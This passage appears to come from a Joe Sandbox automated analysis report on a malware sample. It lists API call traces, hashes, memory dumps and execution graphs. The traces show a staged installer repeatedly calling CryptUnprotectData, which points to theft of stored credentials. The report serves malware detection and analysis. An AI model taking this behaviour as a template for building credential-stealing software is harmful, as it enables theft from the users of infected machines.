                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                            • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,00403A1A,75573420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 1100898210-4083868402
                                                                                                            • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                            • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                            • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                            • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 7013116A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 701311C7
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 701311D9
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70131203
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2274084322.0000000070131000.00000020.00000001.01000000.00000004.sdmp, Offset: 70130000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2273940310.0000000070130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274182585.0000000070134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274265618.0000000070136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70130000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: fba83d51bf168b848661d944d191709ff0c5a8036f73e0408536215be6c5ecac
                                                                                                            • Instruction ID: 559e830aa76189d9d40eca58434450eb0f31dc8d5238f5e314a0399cbe53cc0c
                                                                                                            • Opcode Fuzzy Hash: fba83d51bf168b848661d944d191709ff0c5a8036f73e0408536215be6c5ecac
                                                                                                            • Instruction Fuzzy Hash: B631B2B25002019FD7048F75CD55A6EFBF8FB55710FA24529FA46E7B24EB75E8008BA0
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                            • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:12.1%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:1.7%
                                                                                                            Total number of Nodes:358
                                                                                                            Total number of Limit Nodes:17
                                                                                                            execution_graph 44498 db158 44499 db174 44498->44499 44508 36af0188 44499->44508 44512 36af0198 44499->44512 44500 db1a3 44516 39a8bd48 44500->44516 44509 36af01a4 44508->44509 44532 36afc638 44509->44532 44510 36af01da 44510->44500 44513 36af01a4 44512->44513 44515 36afc638 CryptUnprotectData 44513->44515 44514 36af01da 44514->44500 44515->44514 44517 39a8bd54 44516->44517 44564 39a8bd98 44517->44564 44520 39eb2720 44521 39eb273f 44520->44521 44650 39eb0938 44521->44650 44526 39eb2730 44527 39eb273f 44526->44527 44528 39eb0938 10 API calls 44527->44528 44529 39eb2746 44528->44529 44530 39eb188c 16 API calls 44529->44530 44531 db1b1 44530->44531 44534 36afc66a 44532->44534 44533 36afcaf9 44533->44510 44534->44533 44536 36afcf01 44534->44536 44537 36afcf10 44536->44537 44541 36afd540 44537->44541 44549 36afd550 44537->44549 44538 36afcf80 44538->44534 44542 36afd575 44541->44542 44545 36afd629 44541->44545 44542->44545 44547 36afd540 CryptUnprotectData 44542->44547 44548 36afd550 CryptUnprotectData 44542->44548 44557 36afd730 44542->44557 44561 36afd1ec 44545->44561 44547->44545 44548->44545 44550 36afd629 44549->44550 44551 36afd575 44549->44551 44552 36afd1ec CryptUnprotectData 44550->44552 44551->44550 44554 36afd730 CryptUnprotectData 44551->44554 44555 36afd540 CryptUnprotectData 44551->44555 44556 36afd550 CryptUnprotectData 44551->44556 44553 36afd7f5 44552->44553 44553->44538 44554->44550 44555->44550 44556->44550 44558 36afd745 44557->44558 44559 36afd1ec CryptUnprotectData 44558->44559 44560 36afd7f5 44559->44560 44560->44545 44562 36afd9e0 CryptUnprotectData 44561->44562 44563 36afd7f5 44562->44563 44563->44538 44566 39a8bdb4 44564->44566 44565 db1aa 44565->44520 44565->44526 44569 39a8ce60 44566->44569 44573 39a8ce50 44566->44573 44570 39a8ce7c 44569->44570 44577 39a894b4 44570->44577 44572 39a8ce9b 44572->44565 44574 39a8ce7c 44573->44574 44575 39a894b4 2 API calls 44574->44575 44576 39a8ce9b 44575->44576 44576->44565 44578 39a894bf 44577->44578 44581 39a8cf4f 44578->44581 44582 39a8cf68 44578->44582 44586 39a8cf30 44578->44586 44581->44572 44584 39a8cf76 44582->44584 44583 39a8d021 44583->44583 44584->44583 44593 39a895e8 44584->44593 44587 39a8cf3f 44586->44587 44591 39a8cf4e 44586->44591 44590 39a8cf68 2 API calls 44587->44590 44587->44591 44592 39a8cf30 2 API calls 44587->44592 44588 39a8d021 44589 39a895e8 2 API calls 44589->44588 44590->44591 44591->44581 44591->44588 44591->44589 44592->44591 44594 39a895f3 44593->44594 44596 39a8ec47 44594->44596 44597 39a8e7f4 44594->44597 44596->44583 44599 39a8e7ff 44597->44599 44598 39a8f111 44598->44596 44599->44598 44602 39a8fab0 44599->44602 44610 39a8faa1 44599->44610 44604 39a8fadb 44602->44604 44603 39a8fb8a 44603->44603 44604->44603 44618 39eb00c0 44604->44618 44622 39eb0021 44604->44622 44627 39eb0012 44604->44627 44632 39eb001c 44604->44632 44637 39eb0006 44604->44637 44611 39a8fadb 44610->44611 44612 39a8fb8a 44611->44612 44613 39eb001c 2 API calls 44611->44613 44614 39eb0012 2 API calls 44611->44614 44615 39eb0021 2 API calls 44611->44615 44616 39eb00c0 2 API calls 44611->44616 44617 39eb0006 2 API calls 44611->44617 44613->44612 44614->44612 44615->44612 44616->44612 44617->44612 44642 39eb0110 44618->44642 44646 39eb0104 44618->44646 44623 39eb0059 44622->44623 44625 39eb0110 CreateWindowExW 44623->44625 44626 39eb0104 CreateWindowExW 44623->44626 44624 39eb00f5 44624->44603 44625->44624 44626->44624 44628 39eb0055 44627->44628 44630 39eb0110 CreateWindowExW 44628->44630 44631 39eb0104 CreateWindowExW 44628->44631 44629 39eb00f5 44629->44603 44630->44629 44631->44629 44633 39eb0059 44632->44633 44635 39eb0110 CreateWindowExW 44633->44635 44636 39eb0104 CreateWindowExW 44633->44636 44634 39eb00f5 44634->44603 44635->44634 44636->44634 44638 39eb0041 44637->44638 44640 39eb0110 CreateWindowExW 44638->44640 44641 39eb0104 CreateWindowExW 44638->44641 44639 39eb00f5 44639->44603 44640->44639 44641->44639 44643 39eb0178 CreateWindowExW 44642->44643 44645 39eb0234 44643->44645 44647 39eb0178 CreateWindowExW 44646->44647 44649 39eb0234 44647->44649 44649->44649 44651 39eb0948 44650->44651 44652 39eb0965 44651->44652 44659 39eb0980 44651->44659 44671 39eb0970 44651->44671 44655 39eb188c 44652->44655 44657 39eb1897 44655->44657 44658 39eb2866 44657->44658 44693 39eb1934 44657->44693 44660 39eb09c6 GetCurrentProcess 44659->44660 44662 39eb0a18 GetCurrentThread 44660->44662 44664 39eb0a11 44660->44664 44663 39eb0a55 GetCurrentProcess 44662->44663 44666 39eb0a4e 44662->44666 44665 39eb0a8b 44663->44665 44664->44662 44683 39eb0b4f 44665->44683 44687 39eb0f31 44665->44687 44666->44663 44667 39eb0ab3 GetCurrentThreadId 44668 39eb0ae4 44667->44668 44668->44652 44672 39eb09c6 GetCurrentProcess 44671->44672 44674 39eb0a18 GetCurrentThread 44672->44674 44675 39eb0a11 44672->44675 44676 39eb0a4e 44674->44676 44677 39eb0a55 GetCurrentProcess 44674->44677 44675->44674 44676->44677 44678 39eb0a8b 44677->44678 44681 39eb0b4f 2 API calls 44678->44681 44682 39eb0f31 44678->44682 44679 39eb0ab3 GetCurrentThreadId 44680 39eb0ae4 44679->44680 44680->44652 44681->44679 44682->44679 44689 39eb0bc8 DuplicateHandle 44683->44689 44691 39eb0bc0 DuplicateHandle 44683->44691 44684 39eb0b8e 44684->44667 44688 39eb0f4e 44687->44688 44688->44667 44690 39eb0c5e 44689->44690 44690->44684 44692 39eb0c5e 44691->44692 44692->44684 44695 39eb193f 44693->44695 44694 39eb2e79 44696 39eb2ea9 44694->44696 44697 39eb2ac4 11 API calls 44694->44697 44695->44694 44700 39eb2ed4 44695->44700 44705 39eb3e40 44695->44705 44710 39eb3db2 44695->44710 44696->44700 44715 39eb2ac4 44696->44715 44697->44696 44699 39eb2ec1 44721 39ebd5f8 44699->44721 44728 39ebd608 44699->44728 44700->44657 44707 39eb3e61 44705->44707 44706 39eb3e85 44706->44694 44707->44706 44735 39eb3fe0 44707->44735 44741 39eb3ff0 44707->44741 44711 39eb3e61 44710->44711 44712 39eb3e85 44711->44712 44713 39eb3fe0 12 API calls 44711->44713 44714 39eb3ff0 12 API calls 44711->44714 44712->44694 44713->44712 44714->44712 44716 39eb2acf 44715->44716 44717 39eb0938 10 API calls 44716->44717 44720 39ebd0a1 44716->44720 44718 39ebd0bb 44717->44718 44774 39ebc544 44718->44774 44720->44699 44727 39ebd66d 44721->44727 44722 39ebd899 44723 39eb0938 10 API calls 44722->44723 44725 39ebd6ba 44723->44725 44724 39ebdad0 WaitMessage 44724->44727 44725->44700 44727->44722 44727->44724 44727->44725 44781 39ebc60c 44727->44781 44734 39ebd66d 44728->44734 44729 39ebd899 44730 39eb0938 10 API calls 44729->44730 44732 39ebd6ba 44730->44732 44731 39ebdad0 WaitMessage 44731->44734 44732->44700 44733 39ebc60c DispatchMessageW 44733->44734 44734->44729 44734->44731 44734->44732 44734->44733 44738 39eb3ffd 44735->44738 44736 39eb0938 10 API calls 44737 39eb402b 44736->44737 44739 39eb4036 44737->44739 44747 39eb2bec 44737->44747 44738->44736 44739->44706 44744 39eb3ffd 44741->44744 44742 39eb0938 10 API calls 44743 39eb402b 44742->44743 44745 39eb4036 44743->44745 44746 39eb2bec 12 API calls 44743->44746 44744->44742 44745->44706 44746->44745 44748 39eb2bf7 44747->44748 44750 39eb40a8 44748->44750 44751 39eb2c20 44748->44751 44752 39eb2c2b 44751->44752 44758 39eb2c30 44752->44758 44754 39eb4517 44762 39eb91f0 44754->44762 44768 39eb91d8 44754->44768 44755 39eb4551 44755->44750 44759 39eb2c3b 44758->44759 44760 39eb57a0 44759->44760 44761 39eb3e40 12 API calls 44759->44761 44760->44754 44761->44760 44764 39eb9221 44762->44764 44765 39eb9321 44762->44765 44763 39eb922d 44763->44755 44764->44763 44766 39a8fab0 2 API calls 44764->44766 44767 39a8faa1 2 API calls 44764->44767 44765->44755 44766->44765 44767->44765 44770 39eb9221 44768->44770 44771 39eb9321 44768->44771 44769 39eb922d 44769->44755 44770->44769 44772 39a8fab0 2 API calls 44770->44772 44773 39a8faa1 2 API calls 44770->44773 44771->44755 44772->44771 44773->44771 44775 39ebc54f 44774->44775 44777 39ebd3bb 44775->44777 44778 39ebc560 44775->44778 44777->44720 44779 39ebd3f0 OleInitialize 44778->44779 44780 39ebd454 44779->44780 44780->44777 44782 39ebe708 DispatchMessageW 44781->44782 44783 39ebe774 44782->44783 44783->44727 44784 ad030 44785 ad048 44784->44785 44786 ad0a2 44785->44786 44791 39eb02c8 44785->44791 44796 39eb02b7 44785->44796 44801 39eb1bd0 44785->44801 44808 39eb1bc0 44785->44808 44792 39eb02ee 44791->44792 44794 39eb1bc0 3 API calls 44792->44794 44795 39eb1bd0 3 API calls 44792->44795 44793 39eb030f 44793->44786 44794->44793 44795->44793 44797 39eb02ee 44796->44797 44799 39eb1bc0 3 API calls 44797->44799 44800 39eb1bd0 3 API calls 44797->44800 44798 39eb030f 44798->44786 44799->44798 44800->44798 44802 39eb1bfd 44801->44802 44803 39eb1c2f 44802->44803 44815 39eb9b48 44802->44815 44820 39eb1d58 44802->44820 44830 39eb1d48 44802->44830 44840 39eb9b38 44802->44840 44809 39eb1bfd 44808->44809 44810 39eb1c2f 44809->44810 44811 39eb9b48 2 API calls 44809->44811 44812 39eb9b38 2 API calls 44809->44812 44813 39eb1d48 3 API calls 44809->44813 44814 39eb1d58 3 API calls 44809->44814 44811->44810 44812->44810 44813->44810 44814->44810 44817 39eb9b5c 44815->44817 44816 39eb9be8 44816->44803 44845 39eb9bef 44817->44845 44856 39eb9c00 44817->44856 44821 39eb1d93 44820->44821 44822 39eb1d66 44820->44822 44821->44822 44823 39eb1d98 44821->44823 44827 39eb1d6e 44822->44827 44828 39eb1db1 CallWindowProcW 44822->44828 44829 39eb1dc0 CallWindowProcW 44822->44829 44919 39eb17d0 44823->44919 44825 39eb1da4 44825->44803 44826 39eb1dac 44826->44803 44827->44803 44828->44826 44829->44826 44831 39eb1d93 44830->44831 44832 39eb1d66 44830->44832 44831->44832 44833 39eb1d98 44831->44833 44834 39eb1d6e 44832->44834 44838 39eb1db1 CallWindowProcW 44832->44838 44839 39eb1dc0 CallWindowProcW 44832->44839 44835 39eb17d0 GetCurrentThreadId 44833->44835 44834->44803 44836 39eb1da4 44835->44836 44836->44803 44837 39eb1dac 44837->44803 44838->44837 44839->44837 44841 39eb9b5c 44840->44841 44843 39eb9bef 2 API calls 44841->44843 44844 39eb9c00 2 API calls 44841->44844 44842 39eb9be8 44842->44803 44843->44842 44844->44842 44846 39eb9c11 44845->44846 44867 39ebafbc 44845->44867 44872 39ebaf38 44845->44872 44877 39ebaf74 44845->44877 44882 39ebaf84 44845->44882 44887 39ebaf46 44845->44887 44892 39ebafc0 44845->44892 44897 39ebaff0 44845->44897 44902 39ebb040 44845->44902 44906 39ebaf41 44845->44906 44846->44816 44857 39eb9c11 44856->44857 44858 39ebaf38 2 API calls 44856->44858 44859 39ebafbc 2 API calls 44856->44859 44860 39ebaf41 2 API calls 44856->44860 44861 39ebb040 2 API calls 44856->44861 44862 39ebaff0 2 API calls 44856->44862 44863 39ebafc0 2 API calls 44856->44863 44864 39ebaf46 2 API calls 44856->44864 44865 39ebaf84 2 API calls 44856->44865 44866 39ebaf74 2 API calls 44856->44866 44857->44816 44858->44857 44859->44857 44860->44857 44861->44857 44862->44857 44863->44857 44864->44857 44865->44857 44866->44857 44868 39ebafbd 44867->44868 44869 39ebb05a 44868->44869 44911 39eb1db1 44868->44911 44915 39eb1dc0 44868->44915 44869->44846 44873 39ebaf75 44872->44873 44874 39ebb05a 44873->44874 44875 39eb1db1 CallWindowProcW 44873->44875 44876 39eb1dc0 CallWindowProcW 44873->44876 44874->44846 44875->44874 44876->44874 44878 39ebafb1 44877->44878 44879 39ebb05a 44878->44879 44880 39eb1db1 CallWindowProcW 44878->44880 44881 39eb1dc0 CallWindowProcW 44878->44881 44879->44846 44880->44879 44881->44879 44883 39ebafc1 44882->44883 44884 39ebb05a 44883->44884 44885 39eb1db1 CallWindowProcW 44883->44885 44886 39eb1dc0 CallWindowProcW 44883->44886 44884->44846 44885->44884 44886->44884 44888 39ebaf81 44887->44888 44889 39ebb05a 44888->44889 44890 39eb1db1 CallWindowProcW 44888->44890 44891 39eb1dc0 CallWindowProcW 44888->44891 44889->44846 44890->44889 44891->44889 44893 39ebafc1 44892->44893 44894 39ebb05a 44893->44894 44895 39eb1db1 CallWindowProcW 44893->44895 44896 39eb1dc0 CallWindowProcW 44893->44896 44894->44846 44895->44894 44896->44894 44898 39ebaff7 44897->44898 44899 39ebb05a 44898->44899 44900 39eb1db1 CallWindowProcW 44898->44900 44901 39eb1dc0 CallWindowProcW 44898->44901 44899->44846 44900->44899 44901->44899 44904 39eb1db1 CallWindowProcW 44902->44904 44905 39eb1dc0 CallWindowProcW 44902->44905 44903 39ebb05a 44903->44846 44904->44903 44905->44903 44907 39ebaf7d 44906->44907 44908 39ebb05a 44907->44908 44909 39eb1db1 CallWindowProcW 44907->44909 44910 39eb1dc0 CallWindowProcW 44907->44910 44908->44846 44909->44908 44910->44908 44912 39eb1e02 44911->44912 44914 39eb1e09 44911->44914 44913 39eb1e5a CallWindowProcW 44912->44913 44912->44914 44913->44914 44914->44869 44916 39eb1e02 44915->44916 44918 39eb1e09 44915->44918 44917 39eb1e5a CallWindowProcW 44916->44917 44916->44918 44917->44918 44918->44869 44920 39eb17db 44919->44920 44923 39eb181c 44920->44923 44922 39eb22f5 44922->44825 44924 39eb1827 44923->44924 44925 39eb2461 GetCurrentThreadId 44924->44925 44926 39eb248b 44924->44926 44925->44926 44926->44922 44927 39eb20c0 44930 39eb20ed 44927->44930 44928 39eb213c 44928->44928 44930->44928 44931 39eb17fc 44930->44931 44932 39eb1807 44931->44932 44933 39eb17d0 GetCurrentThreadId 44932->44933 44934 39eb229c 44933->44934 44936 39a895e8 2 API calls 44934->44936 44938 39a8ec19 44934->44938 44935 39eb22a5 44935->44928 44936->44935 44939 39a8ec3a 44938->44939 44941 39a8ec47 44938->44941 44940 39a8e7f4 2 API calls 44939->44940 44939->44941 44940->44941 44941->44935 44942 39eb2020 SetTimer 44943 39eb208c 44942->44943

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 39ebd608-39ebd66b 1 39ebd69a-39ebd6b8 0->1 2 39ebd66d-39ebd697 0->2 7 39ebd6ba-39ebd6bc 1->7 8 39ebd6c1-39ebd6f8 1->8 2->1 10 39ebdb7a-39ebdb8f 7->10 12 39ebdb29 8->12 13 39ebd6fe-39ebd712 8->13 16 39ebdb2e-39ebdb44 12->16 14 39ebd741-39ebd760 13->14 15 39ebd714-39ebd73e 13->15 22 39ebd778-39ebd77a 14->22 23 39ebd762-39ebd768 14->23 15->14 16->10 27 39ebd799-39ebd7a2 22->27 28 39ebd77c-39ebd794 22->28 25 39ebd76a 23->25 26 39ebd76c-39ebd76e 23->26 25->22 26->22 29 39ebd7aa-39ebd7b1 27->29 28->16 30 39ebd7bb-39ebd7c2 29->30 31 39ebd7b3-39ebd7b9 29->31 33 39ebd7cc 30->33 34 39ebd7c4-39ebd7ca 30->34 32 39ebd7cf-39ebd7ec call 39ebc5c0 31->32 37 39ebd7f2-39ebd7f9 32->37 38 39ebd941-39ebd945 32->38 33->32 34->32 37->12 41 39ebd7ff-39ebd83c 37->41 39 39ebd94b-39ebd94f 38->39 40 39ebdb14-39ebdb27 38->40 42 39ebd969-39ebd972 39->42 43 39ebd951-39ebd964 39->43 40->16 49 39ebdb0a-39ebdb0e 41->49 50 39ebd842-39ebd847 41->50 44 39ebd9a1-39ebd9a8 42->44 45 39ebd974-39ebd99e 42->45 43->16 47 39ebd9ae-39ebd9b5 44->47 48 39ebda47-39ebda5c 44->48 45->44 52 39ebd9b7-39ebd9e1 47->52 53 39ebd9e4-39ebda06 47->53 48->49 63 39ebda62-39ebda64 48->63 49->29 49->40 54 39ebd879-39ebd88e call 39ebc5e4 50->54 55 39ebd849-39ebd857 call 39ebc5cc 50->55 52->53 53->48 91 39ebda08-39ebda12 53->91 61 39ebd893-39ebd897 54->61 55->54 65 39ebd859-39ebd877 call 39ebc5d8 55->65 66 39ebd899-39ebd8ab call 39eb0938 call 39ebc5f0 61->66 67 39ebd908-39ebd915 61->67 68 39ebdab1-39ebdace call 39ebc5c0 63->68 69 39ebda66-39ebda9f 63->69 65->61 94 39ebd8eb-39ebd903 66->94 95 39ebd8ad-39ebd8dd 66->95 67->49 83 39ebd91b-39ebd925 call 39ebc600 67->83 68->49 82 39ebdad0-39ebdafc WaitMessage 68->82 86 39ebdaa8-39ebdaaf 69->86 87 39ebdaa1-39ebdaa7 69->87 88 39ebdafe 82->88 89 39ebdb03 82->89 97 39ebd927-39ebd92a call 39ebc60c 83->97 98 39ebd934-39ebd93c call 39ebc618 83->98 86->49 87->86 88->89 89->49 102 39ebda2a-39ebda45 91->102 103 39ebda14-39ebda1a 91->103 94->16 109 39ebd8df 95->109 110 39ebd8e4 95->110 105 39ebd92f 97->105 98->49 102->48 102->91 107 39ebda1e-39ebda20 103->107 108 39ebda1c 103->108 105->49 107->102 108->102 109->110 110->94
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID: $X64X6DX6TX6dX6tX6$$z9$$z9$$z9$$z9
                                                                                                            • API String ID: 2061451462-3521950920
                                                                                                            • Opcode ID: eb18c07dffbe49634b3f9dda7df6a626a38e80f022f9bc5c16de4ebdc8b29566
                                                                                                            • Instruction ID: 64e985e061bbe6286191c7eee59abcb3377bb308b43ee22098ef4bb393f25629
                                                                                                            • Opcode Fuzzy Hash: eb18c07dffbe49634b3f9dda7df6a626a38e80f022f9bc5c16de4ebdc8b29566
                                                                                                            • Instruction Fuzzy Hash: 0AF14AB5A04309CFEB04DFA9C994B9DBBF1BF88304F158169D409AF265DB74E985CB80

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1356 36afd9d9-36afda52 CryptUnprotectData 1357 36afda5b-36afda83 1356->1357 1358 36afda54-36afda5a 1356->1358 1358->1357
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000A7,?,00000000,?,?,?,?), ref: 36AFDA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: 277813fcbb71b33e7f381e38d49fd0a65a4102bdd45912fc6e10ac10b42286e6
                                                                                                            • Instruction ID: b60d23d9f4252906ea9f6971131ec9721f84509b731dda1087e9c1b1f9ec049f
                                                                                                            • Opcode Fuzzy Hash: 277813fcbb71b33e7f381e38d49fd0a65a4102bdd45912fc6e10ac10b42286e6
                                                                                                            • Instruction Fuzzy Hash: 222156B6800249AFDB11DFAAC840BEEBFF4EF49320F148419EA55A7610C339A550DFA5
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000A7,?,00000000,?,?,?,?), ref: 36AFDA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: 26968f542d0ca529358b2feed59301d54ba7b85121be2745e4bef8887009244f
                                                                                                            • Instruction ID: 807893693d412592fa70d91d0031f03b94d24c9b744daaa8c741549f82bacd72
                                                                                                            • Opcode Fuzzy Hash: 26968f542d0ca529358b2feed59301d54ba7b85121be2745e4bef8887009244f
                                                                                                            • Instruction Fuzzy Hash: DE1159B6800349EFDB11DF99C845BDEBFF4EB48320F148419EA14A7250C739A550DFA5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0^8
                                                                                                            • API String ID: 0-200038284
                                                                                                            • Opcode ID: 7dc02d9d08834087a353019f2ceb2fb9221934fa048b411c939dc11f467cacfa
                                                                                                            • Instruction ID: eccc1cdf4eed38a84b8e222237efcdb75b55ff29e717353deb19fc33243e522b
                                                                                                            • Opcode Fuzzy Hash: 7dc02d9d08834087a353019f2ceb2fb9221934fa048b411c939dc11f467cacfa
                                                                                                            • Instruction Fuzzy Hash: 86A190B5E052288FEB18CF6AC944B9DBBF2BF89300F14C1AAD409A7255DB345A85CF51
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0^8
                                                                                                            • API String ID: 0-200038284
                                                                                                            • Opcode ID: f6884e25b09e4463b9824958e1fe9e90931cf9ccf122bdf36248c18acab4c2a2
                                                                                                            • Instruction ID: 501202a8e0817bcbc36be855c07406bd1d42dd377f8f58f8ec56a39ee1b8120d
